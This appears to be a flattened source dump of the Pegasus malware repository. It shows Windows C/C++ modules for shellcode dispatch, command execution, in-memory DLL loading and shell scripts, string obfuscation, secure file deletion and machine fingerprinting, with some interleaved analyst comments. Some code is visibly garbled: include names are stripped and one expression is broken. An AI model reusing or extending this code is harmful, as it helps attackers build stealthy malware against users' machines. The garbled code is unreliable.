RndClass; 13 | 14 | // define the pseudo-class struct 15 | typedef struct _RndClass 16 | { 17 | // internal seed values 18 | SIZE_T lStrucLen; // used as a flag meaning initialization is already done 19 | DWORD m_w; 20 | DWORD m_z; 21 | 22 | // exported methods 23 | VOID(*rgInitSeed) (RndClass *rg, UINT64 i64Seed); 24 | VOID (*rgInitSeedFromTime) (RndClass *rg); 25 | DWORD (*rgGetRndDWORD) (RndClass *rg); 26 | DWORD (*rgGetRnd) (RndClass *rg, DWORD dwMin, DWORD dwMax); 27 | 28 | } RndClass, *PRndClass; 29 | 30 | 31 | // define functions for import-export, used in both compilation modes 32 | typedef struct _RndClass_ptrs { 33 | 34 | BOOL 
(*fnrgNew)(RndClass *rg); // this is sufficient, all other functions are exported internally 35 | 36 | } RndClass_ptrs, *PRndClass_ptrs; 37 | 38 | 39 | 40 | 41 | #ifdef ROUTINES_BY_PTR 42 | 43 | #pragma message(__FILE__": ROUTINES_BY_PTR compilation mode") 44 | 45 | // global var definition to be visible by all modules which use this one 46 | #ifdef __cplusplus 47 | extern "C" RndClass_ptrs RndClass_apis; 48 | #else 49 | extern RndClass_ptrs RndClass_apis; 50 | #endif 51 | 52 | // transparent code replacements 53 | #define rgNew RndClass_apis.fnrgNew 54 | 55 | 56 | VOID RndClass_resolve(RndClass_ptrs *apis); 57 | 58 | #else 59 | 60 | 61 | 62 | #ifdef __cplusplus 63 | extern "C" { 64 | #endif 65 | 66 | // RndClass struc constructor 67 | // fill all the values of passed struct 68 | // NB: re-init safe, no rg rewrite in case func finds struct to be already initialized 69 | // returns TRUE in case values were written, signalizing to caller need to perform additional init steps, like rgInitSeedFromTime 70 | BOOL rgNew(RndClass *rg); 71 | 72 | // init seeds with passed values 73 | // if seeds are 0, the default values are left 74 | VOID rgInitSeed(RndClass *rg, UINT64 i64Seed); 75 | 76 | // internally inits rnd seeds from system time/tickcount values 77 | // may be disabled or rewritten for ring0 code 78 | VOID rgInitSeedFromTime(RndClass *rg); 79 | 80 | // The heart of the generator 81 | // It uses George Marsaglia's MWC algorithm to produce an unsigned integer 82 | DWORD rgGetRndDWORD(RndClass *rg); 83 | 84 | // returns random number in range [dwMin, dwMax] 85 | DWORD rgGetRnd(RndClass *rg, DWORD dwMin, DWORD dwMax); 86 | 87 | VOID RndClass_imports(RndClass_ptrs *apis); 88 | 89 | #ifdef __cplusplus 90 | } 91 | #endif 92 | 93 | 94 | #endif -------------------------------------------------------------------------------- /Pegasus/inc/RegFuncs.h: -------------------------------------------------------------------------------- 1 | /* 2 | RegFuncs.h 3 | */ 4 | 5 | #pragma 
once 6 | 7 | #include 8 | 9 | 10 | LSTATUS RegCreatePath(HKEY hRootKey, LPCWSTR wszRegPath); 11 | BOOL RegWriteDWORD(LPCWSTR wszRegPath, LPCWSTR wszKeyName, DWORD dwValueToSet); 12 | BOOL RegRemoveValue(HKEY hRootKey, LPCWSTR wszRegPath, LPCWSTR wszRegKeyname); 13 | BOOL RegRemoveKey(HKEY hRootKey, LPCWSTR wszRegPath); -------------------------------------------------------------------------------- /Pegasus/inc/SecureClean.h: -------------------------------------------------------------------------------- 1 | /* 2 | SecureClean.h 3 | Headers 4 | */ 5 | 6 | #include 7 | 8 | 9 | BOOL scSecureDeleteFile(LPWSTR wszFilename); -------------------------------------------------------------------------------- /Pegasus/inc/WOW64Detect.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | WOW64Detect.cpp 3 | Routines to detect x64 OS while running from x32 (or x64) binary 4 | 5 | */ 6 | 7 | #include /* NOTE(review): the header name after #include was lost during extraction (angle brackets stripped) */ 8 | 9 | #include "dbg.h" 10 | #include "mem.h" 11 | #include "CryptoStrings.h" 12 | 13 | 14 | #include "WOW64Detect.h" 15 | 16 | 17 | /* 18 | Check if we are running on x64 OS 19 | http://msdn.microsoft.com/en-us/library/windows/desktop/ms684139%28v=vs.85%29.aspx 20 | */ /* Returns TRUE unconditionally when compiled for _M_X64. For _M_IX86 builds it resolves kernel32!IsWow64Process at run time and returns the WOW64 flag of the current process, i.e. TRUE when a 32-bit build runs on 64-bit Windows; FALSE if kernel32 or the export cannot be resolved, if the call fails, or if an exception is raised. The #if/#elif chain below has no #else branch, so on any other target the body is empty and the function returns without a value. Analyst note: "kernel32" and "IsWow64Process" are held as obfuscated blobs and presumably decrypted by CRSTRW/CRSTRA (CryptoStrings.h) just before use, then freed with my_free; the plain strings are not expected to be visible in the binary, and the observable behaviour is GetModuleHandle + GetProcAddress followed by IsWow64Process(GetCurrentProcess()). */ 21 | BOOL IsX64Windows() 22 | { 23 | #if defined(_M_X64) 24 | // in case of x64 targer, just return TRUE, essential for server request 25 | return TRUE; 26 | #elif defined(_M_IX86) 27 | BOOL bRes = FALSE; // func res 28 | LPWSTR wszS; 29 | LPSTR szS; 30 | LPFN_ISWOW64PROCESS fnIsWow64Process; 31 | HMODULE hKernel32; 32 | 33 | __try { 34 | 35 | // get kernel32 handle 36 | wszS = CRSTRW("kernel32", "\xff\x1f\x19\x0c\xf7\x1f\x12\x01\xfd\x09\xfc\xe8\x5c\xb5\x60"); 37 | hKernel32 = GetModuleHandle(wszS); 38 | my_free(wszS); 39 | if (hKernel32) { 40 | 41 | // query IsWow64Process api 42 | szS = CRSTRA("IsWow64Process", "\xff\xbf\x47\x0c\xf1\xbf\x6e\x17\xd8\xa8\xb0\xb2\x5b\x77\x95\xcb\x2c\x62\xf4\xb7\x10\x41\x13"); 43 | fnIsWow64Process = 
(LPFN_ISWOW64PROCESS)GetProcAddress(hKernel32, szS); 44 | my_free(szS); 45 | if (NULL != fnIsWow64Process) { 46 | 47 | if (!fnIsWow64Process(GetCurrentProcess(),&bRes)) { 48 | // handle error 49 | DbgPrint("WARN: fnIsWow64Process returned failure"); 50 | bRes = FALSE; 51 | } 52 | } // fnIsWow64Process 53 | 54 | 55 | } // got kernel32 handle 56 | 57 | 58 | } __except(1) { DbgPrint("WARN: exception"); } /* __except(1) == EXCEPTION_EXECUTE_HANDLER: every SEH exception is swallowed; bRes keeps whatever value it had when the fault occurred and a string buffer allocated before the fault is not freed */ 59 | 60 | DbgPrint("res=%u", bRes); 61 | return bRes; 62 | #endif 63 | } -------------------------------------------------------------------------------- /Pegasus/inc/WOW64Detect.h: -------------------------------------------------------------------------------- 1 | /* 2 | WOW64Detect.h 3 | Headers file 4 | 5 | */ 6 | 7 | #include 8 | 9 | typedef BOOL (WINAPI *LPFN_ISWOW64PROCESS) (HANDLE, PBOOL); // api definition 10 | 11 | BOOL IsX64Windows(); -------------------------------------------------------------------------------- /Pegasus/inc/WorkDispatcher.h: -------------------------------------------------------------------------------- 1 | /* 2 | WorkDispatcher.h 3 | */ 4 | 5 | #include 6 | 7 | #include "..\Shellcode\shellcode.h" 8 | 9 | #pragma pack(push) 10 | #pragma pack(1) 11 | 12 | // termination query request, for version check at PMI_TERMINATE_HOST_PROCESS_IF_LOWER_VERSION pipe message 13 | typedef struct _TERMINATION_QUERY 14 | { 15 | 16 | UINT64 i64TerminationHash; // special build-specific termination hash, to prevent replacement of builds for different targets 17 | WORD wBuildId; // ON QUERY: build id of caller, which requests termination of an already running installation 18 | // ON ANSWER: build id of callee, so caller may check version and perform self-termination in case of a higher existent version 19 | 20 | } TERMINATION_QUERY, *PTERMINATION_QUERY; 21 | 22 | #pragma pack(pop) 23 | 24 | VOID WorkDispatcherInit(SHELLCODE_CONTEXT *sc); -------------------------------------------------------------------------------- /Pegasus/inc/Wow64Jump.h: 
-------------------------------------------------------------------------------- 1 | /* 2 | Wow64Jump.h 3 | */ 4 | 5 | #pragma once 6 | 7 | #include 8 | 9 | VOID wjWow64JumpTo64(); -------------------------------------------------------------------------------- /Pegasus/inc/dbg.c: -------------------------------------------------------------------------------- 1 | /* 2 | dbg.c 3 | Misc debug-related routines. Used only in case of debug build 4 | 5 | Added support of module name in dbg out, which should be defined in 6 | C/C++ > Command Line > Additional options like 7 | /DDBG_MODULENAME="name_of_module" 8 | 9 | */ 10 | 11 | 12 | #include /* NOTE(review): the header name after #include was lost during extraction (angle brackets stripped) */ 13 | #include "dbg.h" 14 | 15 | 16 | 17 | #ifdef _DEBUG 18 | 19 | /* 20 | NB: All procs here are compiled only in DEBUG mode 21 | 22 | 23 | */ 24 | 25 | #pragma message("WARN: DEBUG TOOLS COMPILED") 26 | 27 | // dumps data into filename specified /* Debug-only helper: creates (or truncates, CREATE_ALWAYS) wszTargetFName with no share mode and writes dwLen bytes from pData. WriteFile's return value and dwWritten are not examined, so a short or failed write is silent; when CreateFileW fails nothing is written and no error is reported to the caller. */ 28 | VOID _dbgDumpToFile(PWCHAR wszTargetFName, PVOID pData, DWORD dwLen) 29 | { 30 | HANDLE hFile; 31 | DWORD dwWritten; 32 | 33 | hFile = CreateFileW(wszTargetFName, GENERIC_READ + GENERIC_WRITE, 0, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0); 34 | if (hFile!=INVALID_HANDLE_VALUE) { 35 | WriteFile(hFile, pData, dwLen, &dwWritten, 0); 36 | CloseHandle(hFile); 37 | } 38 | 39 | } 40 | 41 | 42 | 43 | // overhead for OutputDebugStringA adding misc extra information /* Debug-only logging sink. Builds "<exe path>(<tick>h:<pid>/<tid>)[<DBG_MODULENAME> <platform>]: <msg>" into a 12000-byte buffer, makes sure it ends in "\r\n", passes it to OutputDebugStringA and appends the same text to a log file named from GetModuleFileNameA(0, ...) plus ".tlog" (OPEN_ALWAYS, file pointer moved to the end). Observable artifact for analysts: a "<executable path>.tlog" file next to the running module, produced only by _DEBUG builds. The three GlobalAlloc results are not NULL-checked. The whole body sits in a catch-all __except(1); on a fault it writes "dbg exception\r\n" to the debugger and returns, and any buffers allocated before the fault are not freed. */ 44 | VOID _dbgOutString(LPSTR szDbgMsg) 45 | { 46 | 47 | __try { 48 | 49 | LPSTR szBuff; // target buffer for final string 50 | LPSTR szModuleName; 51 | 52 | LPSTR szEndLine = "\r\n"; 53 | 54 | #if defined(_M_X64) 55 | LPSTR szPlatform = "x64"; 56 | #elif defined(_M_IX86) 57 | LPSTR szPlatform = "x32"; 58 | #else 59 | LPSTR szPlatform = "xUNK"; 60 | #endif 61 | 62 | // source code name definition 63 | #if defined(DBG_MODULENAME) 64 | LPSTR szdbgModuleName = QUOTE(DBG_MODULENAME); 65 | #else 66 | #pragma message("WARN: DBG_MODULENAME not defined, use C/C++ > Command Line > Additional options, like 
/DDBG_MODULENAME=\"name_of_module\"") 67 | LPSTR szdbgModuleName = "_"; 68 | #endif 69 | 70 | LPSTR szLogFile; // filename to log into 71 | HANDLE hFile = 0; // file handle 72 | DWORD dwWritten; // amount of bytes written by WriteFile, actually not used 73 | 74 | szBuff = (LPSTR)GlobalAlloc(GPTR, 12000); 75 | szModuleName = (LPSTR)GlobalAlloc(GPTR, 1024); 76 | szLogFile = (LPSTR)GlobalAlloc(GPTR, 1024); 77 | 78 | // query self module name 79 | GetModuleFileNameA(0, szModuleName, MAX_PATH + 1); 80 | lstrcpyA(szLogFile, szModuleName); 81 | lstrcatA(szLogFile, ".tlog"); 82 | 83 | wsprintfA(szBuff, "%s(%04Xh:%u/%u)[%s %s]: %s", szModuleName, GetTickCount(), GetCurrentProcessId(), GetCurrentThreadId(), szdbgModuleName, szPlatform, szDbgMsg ); 84 | 85 | 86 | 87 | // check if last 2 chars are \r\n 88 | if (lstrlenA(szBuff)>2) { 89 | 90 | // compare the last 2 chars with szEndLine (nothing is cut here) 91 | if (lstrcmpA( (LPSTR)( (SIZE_T)szBuff + lstrlenA(szBuff) - 2 ), szEndLine)) { 92 | 93 | // not equal, add newline 94 | lstrcatA(szBuff, szEndLine); 95 | 96 | } // compare last chars 97 | 98 | } // strlen check 99 | 100 | 101 | // output string 102 | OutputDebugStringA(szBuff); 103 | 104 | 105 | 106 | // dump to a logfile too 107 | hFile=CreateFileA(szLogFile, GENERIC_READ + GENERIC_WRITE, FILE_SHARE_READ + FILE_SHARE_WRITE, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0); 108 | if (hFile!=INVALID_HANDLE_VALUE) { 109 | SetFilePointer(hFile, 0, NULL, FILE_END); 110 | WriteFile(hFile, szBuff, lstrlenA(szBuff), &dwWritten, NULL); 111 | CloseHandle(hFile); 112 | } 113 | 114 | 115 | // free some used mem 116 | GlobalFree(szBuff); 117 | GlobalFree(szModuleName); 118 | GlobalFree(szLogFile); 119 | 120 | } __except(1) { __try { OutputDebugStringA("dbg exception\r\n"); } __except(1) {} } 121 | 122 | } 123 | 124 | 125 | 126 | 127 | #endif 128 | -------------------------------------------------------------------------------- /Pegasus/inc/dbg.h: -------------------------------------------------------------------------------- 1 | 
/* 2 | dbg.h 3 | Debug logging and output functions 4 | */ 5 | #pragma once 6 | #include 7 | 8 | #ifdef _DEBUG 9 | 10 | // debug version 11 | 12 | 13 | #ifdef __cplusplus 14 | extern "C" { 15 | #endif 16 | VOID _dbgDumpToFile(PWCHAR wszTargetFName, PVOID pData, DWORD dwLen); 17 | VOID _dbgOutString(LPSTR szDbgMsg); 18 | #ifdef __cplusplus 19 | } 20 | #endif 21 | 22 | 23 | // new dbg 24 | #define QUOTE_(WHAT) #WHAT 25 | #define QUOTE(WHAT) QUOTE_(WHAT) 26 | 27 | #pragma warning(disable:4996) // 'sprintf': This function or variable may be unsafe. 28 | #define DbgPrint(fmt, ...) \ 29 | { LPSTR buff = (LPSTR)GlobalAlloc(GPTR, 0x10000); \ 30 | wsprintfA(buff, "%s: "fmt, __FILE__"@"__FUNCTION__"@"QUOTE(__LINE__), ## __VA_ARGS__); \ 31 | _dbgOutString(buff); \ 32 | GlobalFree(buff); } 33 | 34 | #define _return DbgPrint("this would cause proc to exit, ignoring due to debug mode") 35 | 36 | #else 37 | 38 | // release version 39 | // all macro are assumed to be null 40 | 41 | #define DbgPrint(args, ...) 42 | #define _dbgDumpToFile(args, ...) 
43 | 44 | #define _return return 45 | 46 | 47 | #endif 48 | 49 | -------------------------------------------------------------------------------- /Pegasus/inc/machineid.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | machineid.cpp 4 | Compatible machine id calculation 5 | 6 | */ 7 | 8 | 9 | #include /* NOTE(review): the header name after #include was lost during extraction (angle brackets stripped) */ 10 | 11 | #include "mem.h" 12 | #include "dbg.h" 13 | #include "CryptoStrings.h" 14 | 15 | #include "machineid.h" 16 | 17 | 18 | // perform rol operation on 32-bit argument /* NOTE(review): the return expression below was garbled during extraction (the shift operators were stripped); it appears to have read (dwArg << bPlaces) | (dwArg >> (32 - bPlaces)) — confirm against the original file. If that reading is right, bPlaces == 0 produces a right shift by 32, which is undefined for a 32-bit operand, and the caller's "& 0x1F" mask does allow 0. */ 19 | static DWORD rol(DWORD dwArg, BYTE bPlaces) 20 | { 21 | return ( (dwArg<>(32-bPlaces)) ); 22 | } 23 | 24 | // make dword hash from string /* Non-cryptographic 32-bit string hash used to build the machine id. Per UTF-16 unit: b_cr = (b_cr ^ lowbyte) & 0x1F, then dwResult = rol(dwResult ^ lowbyte, b_cr), where lowbyte is (BYTE)(*pwChar) — only the low byte of each character takes part, so strings differing only in the high byte collide. Iteration stops at the first zero WCHAR, so wszString must be NUL-terminated. Returns 0 for an empty string. The local i is declared but unused. */ 25 | DWORD _myHashStringW(LPWSTR wszString) 26 | { 27 | DWORD dwResult = 0; // output result, temp hash value 28 | BYTE b_cr = 0; // cr shift value 29 | ULONG i = 0; // counter 30 | WORD *pwChar = (WORD *)wszString; 31 | 32 | // loop passed string 33 | while (*pwChar) { 34 | 35 | // make step's shift value, normalized to 4-byte shift (31 max) 36 | b_cr = (b_cr ^ (BYTE)(*pwChar)) & 0x1F; 37 | 38 | // xor hash with current char and rol hash, cr 39 | dwResult = rol(dwResult ^ (BYTE)(*pwChar), b_cr); 40 | 41 | pwChar++; 42 | 43 | } // while !null char 44 | 45 | 46 | // output result 47 | return dwResult; 48 | } 49 | 50 | /* 51 | internal func 52 | Calculates hash for name of first physical disk 53 | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Disk\Enum, value name "0" 54 | */ /* Analyst note: this is the host-fingerprinting step of the machine id. It opens the key above with KEY_READ, queries value "0" twice (size, then data), hashes the string with _myHashStringW and returns that hash, or 0 if any step fails. Both the key path and the value name are stored as obfuscated blobs and presumably decrypted by CRSTRW at run time, then freed with my_free. Notes: RegQueryValueEx reports dwDataLen in bytes, so (dwDataLen + 1) * 2 over-allocates (harmless); whether the buffer is zero-filled, and therefore NUL-terminated when the stored REG_SZ lacks its terminator, depends on my_alloc, which is not visible here. The DbgPrint messages log GetLastError(), but the Reg* APIs return their error code directly and do not necessarily set the last-error value, so the logged code may be stale. */ 55 | DWORD _hwsFirstVolumeModelHash() 56 | { 57 | DWORD dwRes = 0; // func res 58 | HKEY hKey = NULL; // RegOpenKeyEx() res 59 | LPWSTR wszSubkey, wszParamName; // decrypt string buff 60 | DWORD dwDataLen = 0; // key len 61 | LPWSTR wszBuff = NULL; // key buff 62 | 63 | wszSubkey = CRSTRW("SYSTEM\\CurrentControlSet\\services\\Disk\\Enum", 
"\xfd\x3f\x14\x05\xd6\x3f\x27\x34\xde\x13\xd1\xc0\x31\xe4\xc1\xdf\x3f\xe2\xba\xb9\x6e\x88\x9a\x99\x7f\xa8\x78\x5e\x88\x53\x68\x5e\xa8\x75\x22\x24\xce\x02\x07\x31\xc9\x2e\xe7\xe6\x31\xe2\xda\xd8\x20\x30\xe4"); 64 | wszParamName = CRSTRW("0", "\x00\xc0\x92\x0e\x01\xc0\xc2"); 65 | 66 | do { // not a loop 67 | 68 | if (ERROR_SUCCESS != RegOpenKeyEx(HKEY_LOCAL_MACHINE, wszSubkey, 0, KEY_READ, &hKey)) { DbgPrint("ERR: RegOpenKeyEx() failed %04Xh", GetLastError()); break; } 69 | 70 | // key opened ok, query value 71 | if (ERROR_SUCCESS != RegQueryValueEx(hKey, wszParamName, NULL, NULL, NULL, &dwDataLen)) { DbgPrint("ERR: RegQueryValueEx() failed %04Xh", GetLastError()); break; } 72 | 73 | // alloc buff 74 | if (!(wszBuff = (LPWSTR)my_alloc((dwDataLen + 1) * 2))) { DbgPrint("ERR: failed to alloc %u bytes", ((dwDataLen + 1) * 2) ); break; } 75 | 76 | if (ERROR_SUCCESS != RegQueryValueEx(hKey, wszParamName, NULL, NULL, (LPBYTE)wszBuff, &dwDataLen)) { DbgPrint("ERR: RegQueryValueEx() failed %04Xh", GetLastError()); break; } 77 | 78 | // calc hash and store it 79 | dwRes = _myHashStringW(wszBuff); 80 | 81 | } while (FALSE); // not a loop 82 | 83 | if (wszBuff) { my_free(wszBuff); } 84 | if (hKey) { RegCloseKey(hKey); } 85 | 86 | my_free(wszParamName); 87 | my_free(wszSubkey); 88 | 89 | return dwRes; 90 | } 91 | 92 | // main magic is done here /* Builds the 64-bit machine id: high DWORD = _hwsFirstVolumeModelHash() (hash of the first disk's Disk\Enum entry), low DWORD = _myHashStringW() of the NetBIOS computer name from GetComputerName. GetComputerName's return value is not checked, so if it fails the hashed buffer content is whatever my_alloc left there. The "dwHash1" named in the comment below is not a variable; it refers to the _hwsFirstVolumeModelHash() call in the return expression. */ 93 | UINT64 i64MakeMachineID() 94 | { 95 | ULONG iBufferSize = MAX_COMPUTERNAME_LENGTH + 1; 96 | 97 | LPWSTR wszCompName; // buffer for computer's name 98 | DWORD dwHash2; 99 | 100 | // and part2 using Computer name 101 | wszCompName = (LPWSTR)my_alloc(iBufferSize * 2); 102 | GetComputerName(wszCompName, &iBufferSize); 103 | dwHash2 = _myHashStringW(wszCompName); 104 | my_free(wszCompName); 105 | 106 | 107 | // dwHash1 & dwHash2 now contain the resulting parts of machine id hash 108 | return (UINT64)( ((UINT64)_hwsFirstVolumeModelHash() << 32) | (UINT64)dwHash2 ); 109 | 110 | } // func end 111 | 112 | 
-------------------------------------------------------------------------------- /Pegasus/inc/machineid.h: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | machineid.h 4 | 5 | */ 6 | 7 | #pragma once 8 | 9 | #include 10 | 11 | UINT64 i64MakeMachineID(); 12 | 13 | 14 | -------------------------------------------------------------------------------- /Pegasus/inc/mem.h: -------------------------------------------------------------------------------- 1 | /* 2 | mem.h 3 | Headers file 4 | */ 5 | 6 | #pragma once 7 | #include 8 | 9 | #ifdef _DEBUG 10 | //#if defined(_M_IX86) 11 | #define ALLOW_DBGMEM 12 | #define DO_MEMALLOC_LIST_CHECK 13 | //#endif 14 | #endif 15 | 16 | #define MEM_CHUNK_SIGNATURE 0x0BBBBBBBB 17 | #define GUARD_PAGE_SIZE 4096*4 18 | 19 | /* 20 | Used in debug mode to tag every 21 | */ 22 | typedef struct _MEM_CHUNK_TAG 23 | { 24 | DWORD dwSignature; // special signature 25 | WORD wLen; // len of this structure 26 | DWORD dwAllocatedStamp; // ticks count when this chunk was allocated 27 | BYTE bCallerString[128]; // buffer with caller name string 28 | DWORD dwAllocatedSize; // total size of allocated buffer, including this tag 29 | } MEM_CHUNK_TAG, *PMEM_CHUNK_TAG; 30 | 31 | // single chunk pointer by linked list 32 | typedef struct _LIST_CHUNK LIST_CHUNK; 33 | typedef struct _LIST_CHUNK 34 | { 35 | LIST_CHUNK *lcNext; 36 | LPVOID pChunkPtr; 37 | 38 | } LIST_CHUNK, *PLIST_CHUNK; 39 | 40 | 41 | #ifdef ALLOW_DBGMEM 42 | // in debug mode, each my_alloc() is a special macro which sends source code sign 43 | // to be added to memory chunk 44 | #define QUOTE_(WHAT) #WHAT 45 | #define QUOTE(WHAT) QUOTE_(WHAT) 46 | #define my_alloc(lMemSize) my_alloc_int(__FUNCTION__"@"QUOTE(__LINE__), lMemSize) 47 | #define my_free(pMemBuff_in) my_free_int(__FUNCTION__"@"QUOTE(__LINE__), pMemBuff_in) 48 | #ifdef __cplusplus 49 | extern "C" { 50 | #endif 51 | LPVOID my_alloc_int(LPSTR szCaller, SIZE_T lMemSize); 52 | VOID 
my_free_int(LPSTR szCaller, PVOID pMemBuff_in); 53 | #ifdef DO_MEMALLOC_LIST_CHECK 54 | DWORD WINAPI memPrintAllocationListDialog(LPVOID dwParam); 55 | #endif 56 | #ifdef __cplusplus 57 | } 58 | #endif 59 | 60 | #else 61 | 62 | 63 | // release mode functions 64 | 65 | #ifdef __cplusplus 66 | extern "C" { 67 | #endif 68 | LPVOID my_alloc(SIZE_T lMemSize); 69 | VOID my_free(PVOID pMemBuff); 70 | #ifdef __cplusplus 71 | } 72 | #endif 73 | 74 | #endif 75 | 76 | 77 | 78 | #define GLOBAL_ALLOC // if not defined, VirtualAlloc will be used 79 | -------------------------------------------------------------------------------- /Pegasus/lib/amd64/BufferOverflowU.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/lib/amd64/BufferOverflowU.lib -------------------------------------------------------------------------------- /Pegasus/lib/amd64/ntdll.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/lib/amd64/ntdll.lib -------------------------------------------------------------------------------- /Pegasus/lib/i386/BufferOverflowU.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/lib/i386/BufferOverflowU.lib -------------------------------------------------------------------------------- /Pegasus/lib/i386/ntdll.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/lib/i386/ntdll.lib -------------------------------------------------------------------------------- /Pegasus/mod_CmdExec/ceDiskExec.h: 
-------------------------------------------------------------------------------- 1 | /* 2 | ceDiskExec.h 3 | */ 4 | #pragma once 5 | 6 | #include 7 | 8 | #include "..\inc\DataCallbackManager.h" 9 | #include "ceGeneric.h" 10 | 11 | typedef enum DISKEXEC_SPECIFIC_ERROR_CODES { 12 | // ERR_NOVALUE = 0, 13 | ERR_DE_EMPTY_FILE = 1, 14 | ERR_DE_NO_EXTENSION_FOUND, 15 | ERR_DE_TMPFILE_NAME_GENERATE_FAIL, 16 | ERR_DE_CREATEFILE_FAILED, 17 | ERR_DE_WRITEFILE_FAILED, 18 | ERR_DE_FILE_REMOVED_AFTER_CREATION, 19 | ERR_DE_GETSIZE_FAILED, 20 | ERR_DE_SIZE_MISMATCH, 21 | ERR_DE_FILE_READ_FAILED, 22 | ERR_DE_FILE_MODIFIED_AFTER_WRITE 23 | 24 | // ERR_EXEC_ERROR = 1000, // staring range 25 | // ERR_MAXVAL = MAXDWORD 26 | }; 27 | 28 | typedef enum ENUM_PLACEFILE_EXT { 29 | FILE_EXE, 30 | FILE_EXTENS 31 | }; 32 | 33 | BOOL cmdDiskExec(DISPATCHER_CALLBACK_PARAMS *dcp, ENUM_EXECUTE_METHOD ExecMethod); -------------------------------------------------------------------------------- /Pegasus/mod_CmdExec/ceDllMemory.h: -------------------------------------------------------------------------------- 1 | /* 2 | ceDllMemory.h 3 | */ 4 | #pragma once 5 | 6 | #include 7 | #include "..\inc\MyStreams.h" 8 | #include "..\inc\DataCallbackManager.h" 9 | 10 | typedef enum DLLMEM_SPECIFIC_ERROR_CODES { 11 | // ERR_NOVALUE = 0, 12 | ERR_ALREADY_RUNNING = 1, 13 | ERR_EMPTY_FILE, 14 | ERR_PE_LOAD_FAILED, 15 | ERR_DLLENTRY_RETURNED_FALSE, 16 | ERR_DLLENTRY_EXCEPTION, 17 | 18 | // ERR_EXEC_ERROR = 1000, // staring range 19 | // ERR_MAXVAL = MAXDWORD 20 | }; 21 | 22 | // internal globals 23 | typedef struct _DLLMEM_CONTEXT { 24 | 25 | BOOL bInited; // set to TRUE when this context is already inited 26 | MY_STREAM mHashesStream; // hashes of running modules 27 | CRITICAL_SECTION csHashesAccess; // cs to guard access to mHashesStream 28 | 29 | } DLLMEM_CONTEXT, *PDLLMEM_CONTEXT; 30 | 31 | BOOL cmdDllMemory(DISPATCHER_CALLBACK_PARAMS *dcp); 
-------------------------------------------------------------------------------- /Pegasus/mod_CmdExec/ceGeneric.h: -------------------------------------------------------------------------------- 1 | /* 2 | ceGeneric.h 3 | */ 4 | #pragma once 5 | 6 | #include 7 | 8 | // param at cmdDiskExec 9 | typedef enum ENUM_EXECUTE_METHOD { 10 | EEM_CREATEPROCESS, 11 | EEM_SHELLEXECUTE 12 | }; 13 | 14 | // errors returned by _cmdSafeExec() 15 | typedef enum EXEC_ERROR_CODE { 16 | ERR_EXEC_OK = 0, // no error, ok 17 | ERR_EXEC_HUNGED = 1000, 18 | ERR_EXEC_FAILURE 19 | }; 20 | 21 | // params to be passed to a CreateProcessSafe() function 22 | typedef struct _CREATEPROCESS_PARAMS { 23 | 24 | ENUM_EXECUTE_METHOD emExecMethod; // type of exec method to be used 25 | 26 | // std handles for process & controller. Should be NULL if not used 27 | HANDLE hStdInRead, hStdInWrite, hStdOutRead, hStdOutWrite;// , hStdErrRead, hStdErrWrite; 28 | 29 | // params for CreateProcess()/EEM_CREATEPROCESS 30 | LPWSTR wszApplication; 31 | LPWSTR wszCmdline; 32 | 33 | PROCESS_INFORMATION pi; // result in case of CreateProcess()/EEM_CREATEPROCESS 34 | 35 | BOOL bExecResult; // TRUE in case of exec api was ok 36 | DWORD dwLastError; // GetLastError() result after api call 37 | 38 | // internals 39 | HANDLE hExecThread; // handle of a thread used to execute CreateProcess/... 
apis 40 | BOOL bNeedTerminateExecThread; // set by caller if it needs to perform termination of hExecThread thread 41 | BOOL bTerminationStarted; // set by thread when it copied all necessary data and it's safe to free input params ptr 42 | 43 | } CREATEPROCESS_PARAMS, *PCREATEPROCESS_PARAMS; 44 | 45 | 46 | 47 | 48 | 49 | #pragma pack(push) 50 | #pragma pack(1) 51 | 52 | // sent with CER_ERR_SPECIFIC_ERROR result code 53 | typedef struct _CMDEXEC_SPECIFIC_ERROR { 54 | 55 | DWORD dwSpecificErrCode; // internal id of place where an error was catched 56 | DWORD dwLastError; // GetLastError() result 57 | 58 | } CMDEXEC_SPECIFIC_ERROR, *PCMDEXEC_SPECIFIC_ERROR; 59 | 60 | #pragma pack(pop) 61 | 62 | VOID cmFormAnswer(DISPATCHER_CALLBACK_PARAMS *dcp, WORD wResult, LPVOID pPayload, DWORD dwPayloadLen); 63 | VOID cmFormAnswerSpecificErr(DISPATCHER_CALLBACK_PARAMS *dcp, DWORD dwSpecificErrCode, DWORD dwLastError); 64 | BOOL _cmdCreateStdPipes(CREATEPROCESS_PARAMS *cpParams); 65 | VOID _cmdFreeStdPipes(CREATEPROCESS_PARAMS *cpParams); 66 | DWORD WINAPI thrSafeExec(LPVOID lpParameter); 67 | BOOL _cmdSafeExec(CREATEPROCESS_PARAMS *cpParams, EXEC_ERROR_CODE *seError); 68 | -------------------------------------------------------------------------------- /Pegasus/mod_CmdExec/ceShellScript.h: -------------------------------------------------------------------------------- 1 | /* 2 | ceShellScript.h 3 | */ 4 | #pragma once 5 | 6 | #include 7 | 8 | typedef enum SHELLSCRIPT_SPECIFIC_ERROR_CODES { 9 | // ERR_NOVALUE = 0, 10 | ERR_CREATEPIPES_FAIL = 1, 11 | ERR_EMPTY_SHELLSCRIPT, 12 | ERR_STDIN_WRITE_FAILED, 13 | ERR_STDIN_WRITE_FAILED_2, 14 | ERR_PEEKPIPE_FAILED 15 | 16 | 17 | // ERR_EXEC_ERROR = 1000, 18 | // ERR_MAXVAL = MAXDWORD 19 | }; 20 | 21 | BOOL cmdShellScript(DISPATCHER_CALLBACK_PARAMS *dcp); -------------------------------------------------------------------------------- /Pegasus/mod_CmdExec/mod_CmdExec.filters: 
